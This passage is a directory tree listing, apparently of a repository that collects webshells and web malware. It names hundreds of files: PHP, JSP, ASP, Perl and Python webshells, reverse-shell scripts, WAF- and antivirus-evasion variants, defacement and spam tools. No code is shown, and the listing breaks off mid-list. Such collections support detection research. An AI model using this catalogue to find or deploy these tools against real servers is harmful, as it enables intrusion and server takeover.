drag database.php.txt │ ├── system.jsp │ ├── tuo.aspx │ └── 脱mysql数据库.jsp ├── fuzzdb-webshell/ │ ├── README.md │ ├── asp/ │ │ ├── cmd-asp-5.1.asp │ │ ├── cmd.asp │ │ ├── cmd.aspx │ │ ├── cmdasp.asp │ │ ├── cmdasp.aspx │ │ ├── list.asp │ │ ├── list.txt │ │ ├── ntdaddy.asp │ │ └── up.asp │ ├── c/ │ │ └── cmd.c │ ├── cfm/ │ │ ├── cfExec.cfm │ │ ├── cfSQL.cfm │ │ └── cmd.cfm │ ├── jsp/ │ │ ├── CmdServlet.java │ │ ├── ListServlet.java │ │ ├── UpServlet.java │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── list.jsp │ │ ├── up.jsp │ │ └── win32/ │ │ ├── cmd_win32.jsp │ │ └── up_win32.jsp │ ├── php/ │ │ ├── cmd.php │ │ ├── list.php │ │ ├── php-backdoor.php │ │ ├── simple-backdoor.php │ │ └── up.php │ ├── pl-cgi/ │ │ ├── cmd.pl │ │ ├── list.pl │ │ ├── perlcmd.cgi │ │ └── up.pl │ ├── servlet/ │ │ ├── CmdServlet.java │ │ ├── ListServlet.java │ │ └── UpServlet.java │ └── sh/ │ ├── cmd.sh │ ├── list.sh │ └── up.sh ├── java/ │ └── 字节码增强型/ │ └── retransform字节码.md ├── jsp/ │ ├── 000.jsp │ ├── 0000.jsp │ ├── 1.jsp │ ├── 102.jsp │ ├── 123.jsp │ ├── 12302.jsp │ ├── 2.jsp │ ├── 201.jsp │ ├── 2021052101.jsp │ ├── 2022-09-03-01.jsp │ ├── 2022-09-03-02.jsp │ ├── 2022-09-03-03.jsp │ ├── 3.jsp │ ├── 400.jsp │ ├── 403.jsp │ ├── 404.jsp │ ├── 520.jsp │ ├── 807.jsp │ ├── CaiDao-Webshell-Password-LandGrey.jsp │ ├── Chropper for jsp/ │ │ ├── Chropper.java │ │ ├── 菜刀jsp脚本文明版.jsp │ │ ├── 菜刀jsp脚本无压缩版.jsp │ │ ├── 菜刀jsp脚本更新版.jsp │ │ └── 菜刀脚本连接数据库问题.txt │ ├── IXRbE.jsp │ ├── IXRbE02.jsp │ ├── JFolder.jsp │ ├── JSP一句话 │ ├── JSP菜刀一句话木马.jsp │ ├── Java Shell.jsp │ ├── JspSpy.jsp │ ├── JspSpy1.jsp │ ├── JspSpyJDK5.jsp │ ├── JspSpyJDK51.jsp │ ├── JspWebshell 1.2.jsp │ ├── ProcessBuilder-cmd.jsp │ ├── ProcessBuilder-reflect-cmd.jsp │ ├── ROOTtows.jsp │ ├── Runtime-reflect-cmd.jsp │ ├── SJavaWebManageV1.4.jsp │ ├── Silic.jsp │ ├── WebSocket 内存马,一种新型内存马技术.md │ ├── a.jsp │ ├── action.jsp │ ├── asd.jsp │ ├── c5.jsp │ ├── cat/ │ │ ├── Cat.java │ │ ├── cat.jar │ │ ├── cat.jsp │ │ ├── catjsp.md │ │ ├── cmd1.jsp │ │ ├── cmd2.jsp │ │ ├── readme.md │ │ └── test.php │ ├── cmdjsp.jsp │ ├── cofigrue.jsp │ ├── config.jsp │ ├── css.jsp │ ├── customize.jsp │ ├── data.jsp │ ├── data02.jsp │ ├── date.jsp.txt │ ├── dm.jsp │ ├── dy.jsp │ ├── edit_ot.jsp │ ├── guige.jsp │ ├── guige02.jsp │ ├── ha.jsp │ ├── hackk8/ │ │ ├── JSP/ │ │ │ ├── Customize.jsp │ │ │ ├── Java Shell.jsp │ │ │ ├── JspWebshell 1.2.jsp │ │ │ ├── cmdjsp.jsp │ │ │ ├── jsp-reverse.jsp │ │ │ ├── jspspy有屏幕.txt │ │ │ ├── minupload.jsp │ │ │ └── other/ │ │ │ ├── download.jsp │ │ │ ├── jspspy.jsp │ │ │ ├── jspspy_k8.jsp │ │ │ └── thx.jsp │ │ ├── JSP_66/ │ │ │ ├── Customize.jsp │ │ │ ├── Java Shell.jsp │ │ │ ├── JspWebshell 1.2.jsp │ │ │ ├── cmdjsp.jsp │ │ │ ├── jsp-reverse.jsp │ │ │ ├── minupload.jsp │ │ │ └── other/ │ │ │ ├── download.jsp │ │ │ ├── jspspy.jsp │ │ │ ├── jspspy_k8.jsp │ │ │ └── thx.jsp │ │ ├── Struts2下shell兼容性报告_K8.txt │ │ ├── fuck-jsp/ │ │ │ ├── JFolder.jsp │ │ │ ├── JspSpyJDK5.jsp │ │ │ ├── in.jsp │ │ │ ├── job.jsp │ │ │ ├── jspbrowser/ │ │ │ │ ├── 1.jsp │ │ │ │ ├── 2.jsp │ │ │ │ ├── Browser.jsp │ │ │ │ ├── Readme.txt │ │ │ │ ├── example-css.css │ │ │ │ └── gpl.txt │ │ │ ├── ma1.jsp │ │ │ ├── ma2.jsp │ │ │ ├── ma3.jsp │ │ │ ├── ma4.jsp │ │ │ ├── no.jsp │ │ │ ├── silic webshell.jsp │ │ │ └── spjspshell.jsp │ │ ├── jsp2/ │ │ │ ├── CmdServlet.java │ │ │ ├── ListServlet.java │ │ │ ├── UpServlet.java │ │ │ ├── browser.jsp │ │ │ ├── cmd.jsp │ │ │ ├── cmdjsp.jsp │ │ │ ├── jsp-reverse.jsp │ │ │ ├── list.jsp │ │ │ ├── up.jsp │ │ │ └── win32/ │ │ │ ├── cmd_win32.jsp │ │ │ └── up_win32.jsp │ │ └── jsp_77/ │ │ ├── CmdServlet.java │ │ ├── ListServlet.java │ │ ├── UpServlet.java │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── list.jsp │ │ ├── up.jsp │ │ └── win32/ │ │ ├── cmd_win32.jsp │ │ └── up_win32.jsp │ ├── he1p.jsp │ ├── hideShell.jsp │ ├── hsxa.jsp │ ├── hsxa1.jsp │ ├── icesword.jsp │ ├── in.jsp │ ├── inback3.jsp │ ├── index_bak1.jsp │ ├── index_sys.jsp │ ├── indexop.jsp.上传.jsp │ ├── info.jsp │ ├── java/ │ │ ├── java_faces_shell.xhtml │ │ └── readme.md │ ├── jdbc.jsp │ ├── jfolder01.jsp │ ├── job.jsp │ ├── jshell.jsp │ ├── jsp-reverse.jsp │ ├── jsp.jsp │ ├── jsp.txt │ ├── jsp_File_browser.jsp │ ├── jspbrowser/ │ │ ├── 1.jsp │ │ ├── 2.jsp │ │ ├── Browser.jsp │ │ ├── Readme.txt │ │ ├── example-css.css │ │ └── gpl.txt │ ├── jspspy/ │ │ ├── JspSpy.jsp │ │ ├── JspSpy1.jsp │ │ ├── JspSpyJDK5.jsp │ │ ├── JspSpyJDK51.jsp │ │ ├── Jspspyweb.jsp │ │ └── 使用说明.txt │ ├── jweevely.md │ ├── k81.jsp │ ├── k8cmd.jsp │ ├── ks0ljvi9m2.txt │ ├── leo.jsp │ ├── list1.jsp │ ├── luci.jsp.spy2009.jsp │ ├── m.jsp │ ├── ma (1).jsp │ ├── ma.jsp │ ├── ma1.jsp │ ├── ma2.jsp │ ├── ma3.jsp │ ├── ma4.jsp │ ├── maint.jsp │ ├── mg.jsp │ ├── mmym520.jsp │ ├── myxx.jsp │ ├── myxx1.jsp │ ├── netspy/ │ │ ├── netspy.jsp │ │ └── readme.md │ ├── no.jsp │ ├── nogfw.jsp │ ├── ok.jsp │ ├── one8.jsp │ ├── p2j.cn/ │ │ ├── jshell.jsp │ │ └── readme.md │ ├── pb.jsp │ ├── pyth.jsp │ ├── queryDong.jsp │ ├── shell.jsp │ ├── shell1.jsp │ ├── silic webshell.jsp │ ├── spjspshell.jsp │ ├── spyjsp2010.jsp │ ├── struts2/ │ │ ├── dict.txt │ │ └── webshell.txt │ ├── style.jsp │ ├── suiyue.jsp │ ├── sys3.jsp │ ├── system1.jsp.上传.jsp │ ├── t.jsp │ ├── t00ls.jsp │ ├── t00ls1.jsp │ ├── test.jsp │ ├── tree.jsp │ ├── u.jsp │ ├── utils.jsp │ ├── ver007.jsp │ ├── ver008.jsp │ ├── warn.jsp │ ├── web.jsp │ ├── web02.jsp │ ├── webshell-nc.jsp │ ├── x.jsp │ ├── x7.jsp │ ├── xia.jsp │ ├── xm.jsp │ ├── xx.jsp │ ├── yijuhua.jsp │ ├── zend.jsp │ ├── zval.jsp │ ├── zx.jsp │ └── 新型JSP小马支持上传任意格式文件.jsp ├── jspx/ │ ├── Ends/ │ │ ├── Readme.md │ │ └── base64.jspx.txt │ ├── cmd.jspx │ ├── jjw.jspx │ ├── jspspy.jspx │ ├── jspx.jspx │ ├── jsp一句话.txt │ ├── jw.jspx │ └── paxmac.jspx ├── msmap/ │ └── README.md ├── net-friend/ │ ├── ChatRoom/ │ │ ├── 菊花聊天室.asp │ │ └── 菊花聊天室.php │ ├── asp/ │ │ ├── 01.asp │ │ ├── 1.asp │ │ ├── DarkBlade1.3--强大的asp大马/ │ │ │ └── indexx.asp │ │ ├── asp目录可写扫描/ │ │ │ ├── 01.aspx │ │ │ ├── 1.aspx │ │ │ ├── finaly.aspx │ │ │ ├── wt.asp │ │ │ └── wt.aspx │ │ ├── mssql在线管理.asp │ │ ├── 一句话.doc │ │ ├── 修改属性.asp │ │ └── 陆羽asp打包/ │ │ ├── 1.bat │ │ ├── dabao.asp │ │ └── unpack.vbs │ ├── aspx/ │ │ ├── 01.aspx │ │ ├── 1----环境检测功能非常不错.aspx │ │ ├── 1.aspx │ │ ├── 11.aspx │ │ ├── ASP.NET Web BackDoor.aspx │ │ ├── Aspx(免杀).aspx │ │ ├── aspx.aspx │ │ ├── aspxspy/ │ │ │ ├── 1.aspx │ │ │ ├── aspxspy.aspx │ │ │ └── read.txt │ │ ├── aspxspy.aspx │ │ ├── read.txt │ │ ├── sniffer--aspx的嗅探工具.aspx │ │ ├── view.aspx │ │ ├── 干净清爽的大马,不怎么好用.aspx │ │ └── 脱裤4ngle.aspx │ ├── cfm/ │ │ ├── ColdFusion.chm │ │ ├── cfmShell.cfm │ │ ├── cmfshell.cmf │ │ ├── list.cfm │ │ ├── mycode12.cfm │ │ └── xl.cfm │ ├── cgi/ │ │ └── WebShell.cgi │ ├── jsp/ │ │ ├── JFolder.jsp │ │ ├── JspSpyJDK5.jsp │ │ ├── in.jsp │ │ ├── job.jsp │ │ ├── jspbrowser/ │ │ │ ├── 1.jsp │ │ │ ├── 2.jsp │ │ │ ├── Browser.jsp │ │ │ ├── Readme.txt │ │ │ ├── example-css.css │ │ │ └── gpl.txt │ │ ├── ma1.jsp │ │ ├── ma2.jsp │ │ ├── ma3.jsp │ │ ├── ma4.jsp │ │ ├── no.jsp │ │ ├── silic webshell.jsp │ │ └── spjspshell.jsp │ ├── php/ │ │ ├── 2.php │ │ ├── moon.php │ │ ├── php一句话后门.TXT │ │ ├── php网站打包(dodo)/ │ │ │ ├── php网站打包(dodo).doc │ │ │ └── zip.php │ │ ├── php读取iis.txt │ │ ├── s-u.php │ │ └── 零魂PHP一句话木马客户端%28一键提交版%29/ │ │ └── 零魂PHP一句话木马客户端(一键提交版)/ │ │ ├── Readme.txt │ │ └── 零魂PHP一句话木马客户端.htm │ ├── war/ │ │ └── test3693.war │ └── 可读写目录探测/ │ ├── PHP 搜索可读可写目录脚本.php │ ├── 从注册表中读存在路径.aspx │ ├── 啊D小工具 - 目录读写检测 [ASPX版].aspx │ ├── 啊D小工具 - 目录读写检测 [ASP版].asp │ ├── 啊D小工具 - 目录读写检测 [ASP版]说明.txt │ └── 很好用的扫可读可写目录asp脚本xwdir.asp ├── nodejs/ │ └── shell.js ├── other/ │ ├── Axis2Shell/ │ │ ├── README.md │ │ ├── Utils.java │ │ └── config.aar │ ├── README.md │ ├── acat/ │ │ ├── ACat-附数据库驱动-jdk1.5.jar │ │ ├── ACat-附数据库驱动.jar │ │ ├── ACat.jar │ │ ├── ACat_jdk1.5.jar │ │ └── readme.md │ ├── bypass_waf.txt │ ├── cat.aar/ │ │ └── Readme.md │ ├── icesword.war │ ├── jdk1.3webshell/ │ │ ├── readme.MD │ │ ├── test.ear │ │ └── test.war │ ├── ololo.cfm │ ├── pwd.txt │ ├── small_shell.txt │ ├── webshell-pwd.txt │ └── zs.war ├── other shell repository.md ├── php/ │ ├── 12309/ │ │ ├── 12309.php.txt │ │ └── readme.md │ ├── 2011.php │ ├── 2020-08-31-01.php │ ├── 2020.08.20.01.php │ ├── 2020.08.20.02.php │ ├── 2020.08.20.03.php │ ├── 2020.08.20.04.php │ ├── 2020.08.20.05.php │ ├── 2020.08.20.06.php │ ├── 2020.08.20.07.php │ ├── 2020.08.20.08.php │ ├── 2020.08.20.09.php │ ├── 2020.08.20.10.php │ ├── 2020.08.20.11.php │ ├── 2020.08.20.12.php │ ├── 2020.08.20.13.php │ ├── 2020.08.20.14.php │ ├── 2020.08.20.15.php │ ├── 2020.08.20.16.php │ ├── 2020.08.20.17.php │ ├── 2020.08.20.18.php │ ├── 2020.08.20.19.php │ ├── 2020.08.20.20.php │ ├── 2022-08-26-01.php │ ├── 2022-08-26-02.php │ ├── 2022-08-26-03.php │ ├── 2022-08-26-04.php │ ├── 2022-08-26-05.php │ ├── 2022-08-26-06.php │ ├── 2022-08-26-07.php │ ├── 2022-08-26-08.php │ ├── 2022-09-09-02.php │ ├── 2022-09-09-03.php │ ├── 2022-09-09-04.php │ ├── 2022-09-09-05.php │ ├── 2022-09-0901.php │ ├── 20220206.php │ ├── 20220207.php │ ├── 20220213_04.php │ ├── 20220213_05.php │ ├── 20220213_06.php │ ├── 2023-04-08.js │ ├── 2023-04-08.php │ ├── 404.php │ ├── 404.php.no.txt │ ├── 404.php.txt │ ├── 5678.php │ ├── Ani-Shell/ │ │ ├── Ani-Shell.php │ │ └── README.txt │ ├── AntSword_2021-03-06.php │ ├── BNKQbAKQ.txt │ ├── Crack8_PHP.txt │ ├── DAws.md │ ├── How To Exploit PHP Remotely To Bypass Filters & WAF Rules.md │ ├── MemShellForPHP/ │ │ ├── memWebshell.php │ │ ├── readme.md │ │ └── test.txt │ ├── PHPshell/ │ │ ├── Antichat Shell v1.3/ │ │ │ └── Antichat Shell v1.3.php │ │ ├── Crystal/ │ │ │ └── Crystal.php │ │ ├── Dx/ │ │ │ └── Dx.php │ │ ├── MySQL Web Interface Version 0.8/ │ │ │ └── MySQL Web Interface Version 0.8.php │ │ ├── Mysql interface v1.0/ │ │ │ └── Mysql interface v1.0.php │ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/ │ │ │ └── NIX REMOTE WEB-SHELL.php │ │ ├── NetworkFileManagerPHP/ │ │ │ └── NetworkFileManagerPHP.php │ │ ├── PH Vayv/ │ │ │ └── PH Vayv.php │ │ ├── PHP Shell/ │ │ │ └── PHP Shell.php │ │ ├── PHPRemoteView/ │ │ │ └── PHPRemoteView.php │ │ ├── SnIpEr_SA Shell/ │ │ │ └── SnIpEr_SA Shell.php │ │ ├── c99/ │ │ │ └── c99.php │ │ ├── c99_PSych0/ │ │ │ └── c99_PSych0.php │ │ ├── c99_locus7s/ │ │ │ └── c99_locus7s.php │ │ ├── c99_w4cking/ │ │ │ └── c99_w4cking.php │ │ ├── c99shell/ │ │ │ └── c99shell.php │ │ ├── ctt_sh/ │ │ │ └── ctt_sh.php │ │ ├── gfs_sh/ │ │ │ └── gfs_sh.php │ │ ├── iMHaPFtp/ │ │ │ └── iMHaPFtp.php │ │ ├── nstview/ │ │ │ └── nstview.php │ │ ├── r57shell/ │ │ │ └── r57shell.php │ │ ├── r57shell127/ │ │ │ └── r57shell127.php │ │ ├── zacosmall/ │ │ │ └── zacosmall.php │ │ ├── 【C99madShell v. 3.0】/ │ │ │ └── smowu.php │ │ ├── 【EgY_SpIdEr ShElL V2】/ │ │ │ └── EgY_SpIdEr ShElL V2.php │ │ ├── 【PHPJackal v1.5】/ │ │ │ └── PHPJackal v1.5.php │ │ ├── 【PHPJackal】/ │ │ │ └── PHPJackal.php │ │ ├── 【Shell [ci] .Biz was here】/ │ │ │ └── Shell [ci] .Biz was here.php │ │ ├── 【c99_madnet】/ │ │ │ ├── smowu.php │ │ │ └── 密码.txt │ │ ├── 【ironshell】/ │ │ │ ├── ironshell.php │ │ │ └── 密码.txt │ │ ├── 【phpshell-2.1】/ │ │ │ ├── INSTALL │ │ │ ├── config.php │ │ │ ├── phpshell3.php │ │ │ ├── pwhash.php │ │ │ ├── style.css │ │ │ └── 备注.txt │ │ ├── 【r57_Mohajer22】/ │ │ │ └── r57_Mohajer22.php │ │ ├── 【r57_iFX】/ │ │ │ └── r57_iFX.php │ │ ├── 【r57_karta】/ │ │ │ └── r57_kartal.php │ │ └── 【r57】/ │ │ └── r57.php │ ├── PHP简单小马源码.php │ ├── Phpspy 2010 身份验证绕过漏洞 │ ├── Phpspy 2011 继续身份验证绕过漏洞 │ ├── README.md │ ├── Resume.php.txt │ ├── SaiProbe/ │ │ └── SaiProbe_v1.0.php │ ├── Shu1337.php │ ├── YAPS/ │ │ ├── readme.md │ │ └── yaps.php │ ├── YXNzZXJ0YWE.php │ ├── admine21.txt │ ├── admine21_decode.php │ ├── aioshell.php │ ├── angel大马.php │ ├── array_intersect_uassoc-filename-last-char-must-be-r.php │ ├── array_intersect_uassoc-filename-last-char-must-be-s.php │ ├── array_intersect_uassoc-headers-accept-r.php │ ├── array_intersect_ukey-cookie-ass.php │ ├── array_intersect_ukey.php │ ├── array_udiff_assoc.php │ ├── ass.php │ ├── asw.php │ ├── b374k/ │ │ ├── README.md │ │ ├── b374k-2.2.min.php │ │ ├── b374k-2.2.poly.php │ │ ├── b374k-2.3.min.php │ │ ├── b374k-2.3.poly.php │ │ ├── b374k-2.4.min.php │ │ ├── b374k-2.4.poly.php │ │ ├── b374k-2.5.php │ │ ├── b374k-2.6.php │ │ ├── b374k-2.7.php │ │ ├── b374k-2.8.php │ │ ├── b374k-3.2.2.min.php │ │ ├── b374k-3.2.2.php │ │ ├── b374k-3.2.3.min.php │ │ ├── b374k-3.2.3.php │ │ ├── mini_b374k │ │ └── source/ │ │ ├── b374k-2.2.php │ │ ├── b374k-2.3.php │ │ ├── b374k-2.4.php │ │ ├── b374k-2.5.source.php │ │ ├── b374k-2.6.source.php │ │ ├── b374k-2.7.source.php │ │ ├── b374k-2.8.source.php │ │ └── b374k-3.2.2.php │ ├── bat.php │ ├── bat_2.7.php │ ├── bat_b4tm4n.php │ ├── biantai.php │ ├── blackbin/ │ │ ├── 404super.php │ │ └── v1/ │ │ ├── code.php │ │ ├── dev_core.php │ │ ├── make2.php │ │ └── readme.md │ ├── bypass-dog-2020-01-30.php │ ├── bypass-safedog-2016-08-29.php │ ├── bypass-waf-2015-06-10-01.php │ ├── bypass-waf-2015-06-16-01.php │ ├── bypass-waf-2015-06-16-02.php │ ├── bypass-waf-2015-06-16-03.php │ ├── bypass-with-base32.php │ ├── bypass2021-01-04-01.php │ ├── carbylamine.txt │ ├── conflg1.php │ ├── cotent01.md │ ├── create_code_with_xor.py │ ├── create_webshell_with_py.py │ ├── cvwfzthj.php │ ├── error52.php │ ├── fbi.php │ ├── forward_static_call_array-referer-ass.php │ ├── general.php │ ├── get1.php │ ├── getConstants.php │ ├── getConstants2.php │ ├── ghost.php │ ├── ghost_source.php │ ├── gif.php │ ├── gzismexv.php │ ├── h6ss.php │ ├── icesword.php │ ├── indrajith-2.0.txt │ ├── indrajith.txt │ ├── itsec.php │ ├── job.php.txt │ ├── koplak_php%3Bme.txt │ ├── lnc.php │ ├── lpl38-com-php.txt │ ├── mof提权带回显带清楚命令版本.php │ ├── no2.php │ ├── oi.php.decode.txt │ ├── oi.php.txt │ ├── other-decode.php │ ├── other.php │ ├── p2j/ │ │ ├── PHP reflection.php.txt │ │ ├── PHP反射后门.php.txt │ │ └── Readme.md │ ├── pHp一句话扫描脚本程序.php │ ├── pas/ │ │ ├── pas.php │ │ └── password.txt │ ├── pass-waf-2014-10-19.php │ ├── php-extension-backdoor.md │ ├── php-sh/ │ │ ├── client.py │ │ └── server.php │ ├── php-xor.md │ ├── php-xor.php.md │ ├── php1.php │ ├── php7.1_bypass.php │ ├── php_niu_1.php │ ├── php_niu_2.php │ ├── php_webshell.py │ ├── phpkit-0.1a/ │ │ ├── README │ │ ├── odd.php │ │ └── phpkit.py │ ├── phpkit-0.2a/ │ │ ├── CHANGELOG │ │ ├── README │ │ ├── odd.php │ │ ├── phpkit.py │ │ └── upload.py │ ├── phpkit-1.0/ │ │ ├── README.txt │ │ ├── odd.php │ │ └── phpkitcli.py │ ├── phpshell.php.txt │ ├── phpspy/ │ │ ├── 2008.php │ │ ├── 2009lite.php │ │ ├── 2009mssql.php │ │ ├── 2011.php │ │ ├── 2013加密.php │ │ ├── 2013未加密.php │ │ ├── 2014phpspy.php │ │ ├── phpspy2010.php │ │ ├── phpspy_2005_full.php │ │ ├── phpspy_2005_lite.php │ │ └── phpspy_2006.php │ ├── phpwebshell pass by waf for share.md │ ├── php一句话 │ ├── php一句话02.txt │ ├── php版iisspy.php │ ├── poison.php │ ├── priv8-2012-bypass-shell.php.txt │ ├── priv95.php.txt │ ├── r00ts php大马.php │ ├── reverseshell-poc.txt │ ├── s.php.txt │ ├── session91.php │ ├── shell.php │ ├── shell.php.txt │ ├── silic.php │ ├── simple_2022_08_15.php │ ├── spy.php │ ├── supers.php │ ├── sure.php_.txt │ ├── system2022-08-22-2.php │ ├── system2022-08-22-3.php │ ├── system2022-08-22-4.php │ ├── system2022-08-22.php │ ├── tank96a/ │ │ ├── getcode.php │ │ ├── readme.md │ │ └── webshell.php │ ├── test.php │ ├── tiamo.php.decode.txt │ ├── tiamo.php.txt │ ├── tips.md │ ├── tk.php │ ├── tk_dencode_1.php │ ├── tw/ │ │ └── 2015-09-12.md │ ├── twitter/ │ │ ├── 1n73ction.php │ │ ├── 404 shell code.php │ │ ├── adminer-4.2.4.php │ │ ├── bh.php │ │ ├── bukapalapak.php │ │ ├── gamestopceker.php │ │ ├── mailer.php │ │ ├── promailerv2.php │ │ ├── qyt0dHv1.php │ │ └── v4xGus6X.php │ ├── ucen.php │ ├── upsi1on.php │ ├── w.php │ ├── webshell-123.php │ ├── webshell-cnseay-x.php │ ├── webshell-cnseay02-1.php │ ├── webshell-without-alphanumeric2.php │ ├── webshell免杀-提升兼容性.html │ ├── wloymzuk.php │ ├── wp_backup.php │ ├── wpes/ │ │ ├── readme.md │ │ └── wpes-v0.2.php │ ├── wsb/ │ │ ├── ReadMe.txt │ │ ├── idc.php │ │ └── wsb.pl │ ├── wso/ │ │ ├── WSO_4_0_5.php │ │ ├── WSO_base64.php │ │ ├── readme.md │ │ ├── wso-4.1.3.php │ │ ├── wso-4.2.0.php │ │ ├── wso-4.2.1.php │ │ ├── wso-4.2.2.php │ │ ├── wso-4.2.3.php │ │ ├── wso-4.2.4.php │ │ ├── wso-4.2.5.php │ │ ├── wso.php │ │ ├── wso2.php │ │ ├── wso2_pack.php │ │ └── wso_404.php │ ├── wso-ng/ │ │ ├── wso-ng.php │ │ └── wsoExGently.php │ ├── wso2.5.1.php │ ├── wso2.php.txt │ ├── xd20.txt │ ├── xd30.txt │ ├── xiao.php.txt │ ├── xiaom.php │ ├── xslt.php │ ├── xw.php │ ├── yyihacker.php.txt │ ├── zone_hackbar.php │ ├── zone_hackbar_beutify.php │ ├── zone_hackbar_other.php │ ├── zw.php │ ├── zxc/ │ │ ├── .v.php │ │ ├── README.md │ │ ├── bypass403.php │ │ ├── kyo.php │ │ └── shell.php │ ├── 一个过安全狗的pHp一句话.php │ ├── 一句话2015-06-10-01.php │ ├── 一句话2015-06-10-02.php │ ├── 一句话2015-06-10-03.php │ ├── 一句话木马的精简史.md │ ├── 不带引号的pHp一句话.php │ ├── 另类PHP一句话小马.md │ ├── 国外某论坛不含Get,Post的pHp一句话.php │ ├── 极其隐蔽的pHp小马穿插在正常页面中.php │ ├── 某变异pHp一句话木马.php │ ├── 牛X的pHp一句话.php │ ├── 过各大杀软的pHp一句话.php │ └── 非常规的pHp一句话木马.php ├── php_niu_3.php ├── pl/ │ ├── Silic Group_cgi.pl │ ├── Silic Group_readme.txt │ ├── WebShell.cgi.pl │ ├── exim.pl │ ├── hmass (priv8 mass defacor).pl │ ├── inc.pl │ ├── ka0tic.pl │ ├── lurm_safemod_on.cgi.pl │ ├── perlweb_shell.pl │ ├── perlwebshell-0.1/ │ │ ├── AUTHORS │ │ ├── COPYING │ │ ├── ChangeLog │ │ ├── INSTALL │ │ ├── README │ │ └── perlwebshell.cgi │ ├── pps-pl/ │ │ ├── pps-v1.0.pl │ │ ├── pps-v3.0.pl │ │ ├── pps-v3.5.pl │ │ └── pps-v4.0.pl │ ├── rcpexp.pl │ ├── remot shell.pl │ ├── telnet.cgi.pl │ └── telnet.pl ├── proxy.py ├── py/ │ ├── Phyton Shell.py │ ├── cgi-python.py │ ├── d00r_py3.py │ ├── darkBC.py.txt │ ├── python flask 内存马.md │ ├── sctp_reverse.py.txt │ └── smtpd.py ├── rec/ │ └── readme.md ├── upsi1on/ │ └── webshell/ │ └── sungux/ │ ├── decrypt.php │ └── encrypt.php ├── web-malware-collection-13-06-2012/ │ ├── ASP/ │ │ ├── 3fexe.txt │ │ ├── ASpy.txt │ │ ├── EFSO.txt │ │ ├── ELMALISEKER Backd00r.asp │ │ ├── NTDaddy.v1.9.txt │ │ ├── RHTools.v1.5-BETA.txt │ │ ├── RemExp.asp │ │ ├── Server Variables.asp │ │ ├── aspSH.v1.txt │ │ ├── aspxSH.txt │ │ ├── aspxshell.aspx.txt │ │ ├── aspydrv.asp │ │ ├── aspydrv.txt │ │ ├── cmd.asp │ │ ├── cmd.aspx │ │ ├── cmdexec.aspx │ │ ├── elmaliseker.asp │ │ ├── filesystembrowser.aspx │ │ ├── fileupload.aspx │ │ ├── list.asp │ │ ├── ntdaddy.asp │ │ ├── spexec.aspx │ │ ├── sql.aspx │ │ ├── tool.asp │ │ ├── toolaspshell.txt │ │ ├── up.asp │ │ ├── zehir.asp │ │ ├── zehir.txt │ │ ├── zehir4.asp │ │ └── zehir4.txt │ ├── JSP/ │ │ ├── JspWebshell 1.2.jsp │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmd_win32.jsp │ │ ├── jspShell.jsp │ │ ├── jspbd.jsp │ │ ├── list.jsp │ │ ├── up.jsp │ │ └── up_win32.jsp │ ├── Other/ │ │ ├── cmd.c │ │ └── cmd.cfm │ ├── PHP/ │ │ ├── 150.php │ │ ├── 27.9.txt │ │ ├── 2mv2.txt │ │ ├── 404.php │ │ ├── 404.txt │ │ ├── Ajax_PHP Command Shell.txt │ │ ├── Ajax_PHP Command Shell.txt.1 │ │ ├── Ani-Shell.php │ │ ├── AntiSecShell.v0.5.txt │ │ ├── Antichat Shell v1.3.php │ │ ├── Antichat Shell v1.3.txt │ │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt │ │ ├── Backdoor.PHP.Agent.php │ │ ├── Crystal.txt │ │ ├── CrystalShell v.1.txt │ │ ├── Cyber Shell (v 1.0).php │ │ ├── DTool Pro.txt │ │ ├── Dive Shell 1.0 - Emperor Hacking Team.php │ │ ├── Dive Shell 1.0 - Emperor Hacking Team.txt │ │ ├── Dx.txt │ │ ├── DxShell.1.0.txt │ │ ├── FaTaLisTiCz_Fx.txt │ │ ├── Fx29Sh.3.2.12.08.txt │ │ ├── G5.php │ │ ├── GFS web-shell ver 3.1.7 - PRiV8.txt │ │ ├── GNY.Shell.v1.1.txt │ │ ├── KAdot Universal Shell v0.1.6.php │ │ ├── KAdot Universal Shell v0.1.6.txt │ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php │ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt │ │ ├── Macker's Private PHPShell.php │ │ ├── Moroccan Spamers Ma-EditioN By GhOsT.txt │ │ ├── MySQL Web Interface Version 0.8.php │ │ ├── MySQL Web Interface Version 0.8.txt │ │ ├── Mysql interface v1.0.txt │ │ ├── NCC-Shell.txt │ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php │ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt │ │ ├── NetworkFileManagerPHP.txt │ │ ├── PH Vayv.txt │ │ ├── PHANTASMA.txt │ │ ├── PHP Shell.txt │ │ ├── PHPJackal.txt │ │ ├── PHPRemoteView.txt │ │ ├── PHPSPY.php │ │ ├── Php_Backdoor.txt │ │ ├── Private-i3lue.php │ │ ├── Private-i3lue.txt │ │ ├── RedhatC99 [login=redhat-pass=root] │ │ ├── Rootshell.v.1.0.txt │ │ ├── Safe mode breaker.php │ │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt │ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php │ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt │ │ ├── Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.txt │ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php │ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt │ │ ├── SimShell 1.0 - Simorgh Security MGZ.php │ │ ├── SimShell 1.0 - Simorgh Security MGZ.txt │ │ ├── SnIpEr_SA Shell.txt │ │ ├── Sst-Sheller.php │ │ ├── SyRiAn.Sh3ll.v7.txt │ │ ├── WinX Shell.php │ │ ├── WinX Shell.txt │ │ ├── Worse Linux Shell.php │ │ ├── Worse Linux Shell.txt │ │ ├── a.php │ │ ├── aZRaiLPhp v1.0.php │ │ ├── aZRaiLPhp v1.0.txt │ │ ├── accept_language.txt │ │ ├── acid.php │ │ ├── antichat.php │ │ ├── arabicspy.php │ │ ├── b37.php │ │ ├── b374k.v1.txt │ │ ├── backupsql.txt │ 